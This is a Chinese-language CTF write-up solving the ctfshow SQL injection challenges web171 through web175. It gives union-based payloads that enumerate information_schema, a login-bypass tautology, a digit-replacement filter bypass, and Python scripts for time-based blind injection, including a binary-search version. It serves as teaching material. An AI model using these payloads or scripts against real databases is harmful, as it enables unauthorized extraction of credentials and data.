当前位置：首页 > news >正文

ctfshow-web入门-sql注入（web171-web175）

news 来源：原创 2024/9/19 10:07:32

1、web171

2、web172

3、web173

4、web174

5、web175

1、web171

单引号测一下，报错

--+ 闭合后回显正常

也可以用 # ，不过需要 URL 编码

成功闭合之后，先判断下字段数：

1' order by 3--+

3 的时候正常

4 的时候报错，说明只有 3 列

测了一下，三个回显位都能正常回显：

0' union select 1,2,3--+

先查一下基本信息：

0' union select database(),user(),version()--+

当前数据库名为 ctfshow_web

这里说明一下，因为 mysql 5.0 及其以上的都会自带一个叫 information_schema 的数据库，相当于是一个已知的数据库，并且该数据库下储存了所有数据库的所以信息。

查该数据库下的所有表：

0' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='ctfshow_web'--+

其中 2 和 3 只是占位符

可以看到存在一个名为 ctfshow_user 的表，我们继续查该表下的列名：

0' union select group_concat(column_name),2,3 from information_schema.columns where table_schema='ctfshow_web'and table_name='ctfshow_user'--+

没看到 flag 这种关键字，因此我们 id,username,password 都查一下：

0' union select id,username,password from ctfshow_web.ctfshow_user--+

最终在 id 为 26 的 password 里找到 flag：ctfshow{64dd0daa-4600-4813-8ef2-cffa99a6f05f}

当然这种没有绕过的给到 sqlmap 就直接一把嗦了，这里简便的方法也可以采用万能密码：

1'or 1 --+

2、web172

在无过滤注入 1 里面用万能密码未找到 flag

试一下注入 2 的，经过测试这里的回显位只有两个

数据库都懒得查了，用 database() 代替，直接查表：

0' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()--+

新增了一个 ctfshow_user2 的表，查一下该表下面内容，注意这里有一个检查，要求 username 的内容不能是 flag，才能正常查询成功，那么我们就不查 username ，查 id 和 password 就行了：

0' union select id,password from ctfshow_user2--+

当然也可以只查 password：

0' union select 1,password from ctfshow_user2--+

拿到 flag：ctfshow{97bd5892-2617-417a-8c2e-16134f741704}

如果查询内容有 username，因为 username 里包含了 'flag'，因此无法正常回显 flag 的内容：

3、web173

判断一下这次又是三个字段数了，根据前面的规律，这次的表名应该是：ctfshow_web.ctfshow_user3，因为还是对输出过滤了 flag，所有我们还是不查用户名，用占位符占位即可。

payload：

只查 password

0' union select 1,2,password from ctfshow_web.ctfshow_user3--+

查 id 与 password

0' union select id,2,password from ctfshow_web.ctfshow_user3--+

拿到 flag：ctfshow{eff707be-5727-412e-93be-2c75e5783fa5}

4、web174

还没查就报错了

这里有点问题，手动改一下请求文件为：select-no-waf-4.php

可以发现这里查询结果的输出不能出现数字

查询语句的内容也不能出现数字

可以查到数据库名：ctfshow_web ，因为数据库名里没有数字

但是查表名就不行了，根据前面规律，表名应该为 ctfshow_user4，包含了数字，所以结果出不来，不能直接查。

0' union select group_concat(table_name),'a' from information_schema.tables where table_schema=database()--+

对输出结果进行替换后再输出，将数字都替换成字母，payload：

0' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(group_concat(table_name),'1','A'),'2','B'),'3','C'),'4','D'),'5','E'),'6','F'),'7','G'),'8','H'),'9','I'),'0','J'),'a' from information_schema.tables where table_schema=database()--+

查询结果为：ctfshow_userD

D 对应的是 4 ，因此表名为：ctfshow_user4

查询 password：

0' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'1','A'),'2','B'),'3','C'),'4','D'),'5','E'),'6','F'),'7','G'),'8','H'),'9','I'),'0','J'),'a' from ctfshow_user4--+

得到：ctfshow{eIdGcBcc-cACA-DEIF-aGcB-aAJGdJddGBCe}

最后将查询结果的数字替换回去，也可以用 replace 函数，反过来即可。

这里用 python 实现：

def rev_replace(txt):repl = {'A': '1','B': '2','C': '3','D': '4','E': '5','F': '6','G': '7','H': '8','I': '9','J': '0'}for k, v in repl.items():txt = txt.replace(k, v)return txttxt = input("输入：")
out = rev_replace(txt)
print("替换后: ", out)

拿到 flag：ctfshow{e9d7c2cc-c131-4596-a7c2-a107d0dd723e}

5、web175

正常的查 1 都没有回显

if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){$ret['msg']='查询成功';}

正则匹配过滤掉的是所有 ASCII 字符（从 \x00 到 \x7f，也就是从 0 到 127 的所有字符，包括控制字符、数字、字母和符号）。

因此这里采用时间盲注，先测试一下：

1' and sleep(5)--+

观察页面确实存在延时

我个人比较菜，然后一直都是脚本小子，这次自己来写一下，希望能更好的理解下时间盲注。

首先看了下它这里除了查询的 id，还有另外的两个参数，这个我们在写脚本时也需要加进去，并且注意到，它调用的接口其实是 /api 下的 v5.php，而不是 select-no-waf-5.php 这个文件哦。

接下来我们先判断下它数据库名的长度，这个其实可以通过 burpsuite 的攻击模块爆破的，没关系，我们这里手写一遍，也锻炼下我们 python 的能力。

关于 burpsuite 用来爆破这种时间盲注，以及一些原理可以参考我之前的博客：

关于SQL时间盲注（基于sleep函数）的手动测试、burpsuite爆破、sqlmap全自动化注入_sql 语句 and sleep-CSDN博客https://blog.csdn.net/Myon5/article/details/135241105?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522172242605416800175758093%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=172242605416800175758093&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-2-135241105-null-null.nonecase&utm_term=%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450payload：

1' and if(length(database())=11,sleep(3),0) --+

import requestsurl = 'http://e03daa7b-66ad-48fb-8349-da520b7f5fe8.challenge.ctf.show/api/v5.php'
i = 0
for i in range(1, 15):payload = f"id=1' and if(length(database())={i},sleep(3),0) --+&page=1&limit=10"# print(payload)re = requests.get(url, params=payload)time = re.elapsed.total_seconds()print(f"{i}:{time}")# print(re.url)

可以看到当数据库名长度为 11 时，响应存在延时，这与我们前面得到的数据库名为：ctfshow_web，长度就是 11符合。

下面使用两个 for 循环遍历数据库名，从第一个字符猜到第 11 个字符，字符的可能性这里字典设置的是小写字母加数字加下划线：

import requests
import stringurl = 'http://2e5bbcf3-38df-43a5-b8a5-710f30ae9957.challenge.ctf.show/api/v5.php'
dic = string.ascii_lowercase + string.digits + '_'
out = ''
for j in range(1, 12):for k in dic:payload = f"id=1' and if(substr(database(),{j},1)='{k}',sleep(3),0) --+&page=1&limit=10"# print(payload)re = requests.get(url, params=payload)time = re.elapsed.total_seconds()# print(f"{j}:{time}")if time > 2:print(k) out += k #响应延时则将猜测的字符添加到结果里break #跳出内层的for循环，继续遍历下一位
print(out)

跑完得到数据库名为：ctfshow_web

接下来我们继续猜表名，这里就不先判断表名的长度了，设置范围大一点，以确保完整输出数据，使用标志位来判断是否到了最后一位：

import requests
import stringurl = 'http://2e5bbcf3-38df-43a5-b8a5-710f30ae9957.challenge.ctf.show/api/v5.php'
dic = string.ascii_lowercase + string.digits + '_'
out = ''
for j in range(1, 30):a = 1 #设置一个标志位，用来判断是否已经猜到了最后一位for k in dic:# payload = f"id=1' and if(substr(database(),{j},1)='{k}',sleep(3),0) --+&page=1&limit=10"payload = f"id=1' and if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"# print(payload)re = requests.get(url, params=payload)time = re.elapsed.total_seconds()# print(f"{j}:{time}")if time > 2:print(k)a = 0 #如果找到字符，则将标志位置0out += kbreak #跳出内层的for循环，继续遍历下一位if a == 1: #在进行下一次循环前，先判断当前字符是否找到break #若没有找到，则跳出外层循环，表示我们已经到了最后一个字符
print(out)

得到表名为：ctfshow_user5

我们可以通过调整 limit 的参数来获取到其他的表名，有时候也可以使用 group_concat 函数。

payload = f"id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"

在 SQL 中，LIMIT 子句用于指定查询结果中返回的行数，用法：

LIMIT offset, count

offset 是要跳过的行数，offset 从 0 开始计数，count 是要返回的行数。

比如：

LIMIT 0, 1

从查询结果的第 0 行（即第一行）开始，返回 1 行结果，即返回了查询结果的第一行。

LIMIT 1, 1

从查询结果的第 1 行（即第二行）开始，返回 1 行结果，即返回了查询结果的第二行。

这里尝试找第二行，发现一会代码就结束了，说明这里只有一个表：

接下来查列名：

payload = f"id=1' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web'and table_name='ctfshow_user5'), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"

这里只出了一个 id，因为换行导致我们误判为到了最后一个字符，因为我们的字典里只包括数字、小写字母和下划线，因此字符没找到，便跳出外层循环结束了代码。

注释掉最后两句判断结束的语句即可输出完整结果：

也可以通过 limit 来指定查询第三行的内容：

payload = f"id=1' and if(substr((select column_name from information_schema.columns where table_schema='ctfshow_web'and table_name='ctfshow_user5' limit 2, 1), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"

因为我编程能力确实很差，所以这个代码还是存在很多问题的，需要继续改进和完善。

由于前面的题目，我们知道 flag 在 password 字段里，那么我们就查它：

由于 flag 不在第一行，因此我们再细化查询的条件，即 username='flag'

payload = f"id=1' and if(substr((select password from ctfshow_web.ctfshow_user5 where username='flag'), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"

因为 flag 内容还包括了大括号和减号，为了避免提早结束，我们拓展下字典：

dic = string.ascii_lowercase + string.digits + '_-{}'

结果的长度也得扩展：

for j in range(1, 100):

最终的脚本：

import requests
import stringurl = 'http://2e5bbcf3-38df-43a5-b8a5-710f30ae9957.challenge.ctf.show/api/v5.php'
dic = string.ascii_lowercase + string.digits + '_-{}'
out = ''
for j in range(1, 100):a = 1 #设置一个标志位，用来判断是否已经猜到了最后一位for k in dic:# payload = f"id=1' and if(substr(database(),{j},1)='{k}',sleep(3),0) --+&page=1&limit=10" # 猜数据库名# payload = f"id=1' and if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10" #猜表名# payload = f"id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10" #猜表名# payload = f"id=1' and if(substr((select column_name from information_schema.columns where table_schema='ctfshow_web'and table_name='ctfshow_user5' limit 2, 1), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"  # 猜列名payload = f"id=1' and if(substr((select password from ctfshow_web.ctfshow_user5 where username='flag'), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"  # 猜具体字段# print(payload)re = requests.get(url, params=payload)time = re.elapsed.total_seconds()# print(f"{j}:{time}")if time > 2:print(k)a = 0 #如果找到字符，则将标志位置0out += kbreak #跳出内层的for循环，继续遍历下一位if a == 1: #在进行下一次循环前，先判断当前字符是否找到break #若没有找到，则跳出外层循环，表示我们已经到了最后一个字符
print(out)

拿到 flag：ctfshow{d6c5132a-3611-4cd3-a840-37e6a68ac6dd}

同理，当我们注释掉最后两行判断结束的代码，并使用 group_concat，就算不追加 username='flag' 的条件，也是可以查到 flag 的，不过这个时间就比较久了，因为我们查的是所有的数据：

payload = f"id=1' and if(substr((select group_concat(password) from ctfshow_web.ctfshow_user5), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"

大致就这样吧，不敢相信我竟然自己写了个盲注的脚本，还加了那么多注释和个人理解，我知道我的代码写得不好，因为还在慢慢学习嘛，对于时间盲注其实更高效的查询方法是二分法查询，这次我主要是练习下自己动手写代码的能力，如果你也是不会写代码，认真看完相信你也能收获些东西的，最后附上二分法查找的代码和注释，写的不好，互相学习吧：

import requestsurl = 'http://de93f700-084d-447e-a783-efdbd7efc984.challenge.ctf.show/api/v5.php'
out = ''
for i in range(1, 100):left, right = 32, 128  # 设置ASCII值的搜索范围mid = (left + right) // 2  # 计算中间值while left < right:# 这里用ascii函数来获取当前字符的ASCII值，与中间值进行比较，注意这条语句是sql中的用法，在python里获取ascii值是用ord函数payload = f"id=1' and if(ascii(substr((select group_concat(password) from ctfshow_web.ctfshow_user5 where username='flag'), {i}, 1)) > {mid},sleep(3),0) --+&page=1&limit=10"re = requests.get(url, params=payload)time = re.elapsed.total_seconds()if time > 2:  # 存在延时,说明当前字符的ascii值大于我们的中间值left = mid + 1  # 调整查找的范围，既然大于那说明ascii值是在中间值的右边，将中间值加1else:  # 不存在延时，说明当前字符的ascii值小于中间值，在左边right = mid  # 左边起始位置不变，将右边的查找范围调整为中间值mid = (left + right) // 2  # 无论查询字符在左边还是右边，中间值都等于更新后的right+left再整除2，之后继续执行while循环，直到找到目标字符的ascii值，left=right，退出while循环print(mid)  out += chr(mid)print(out)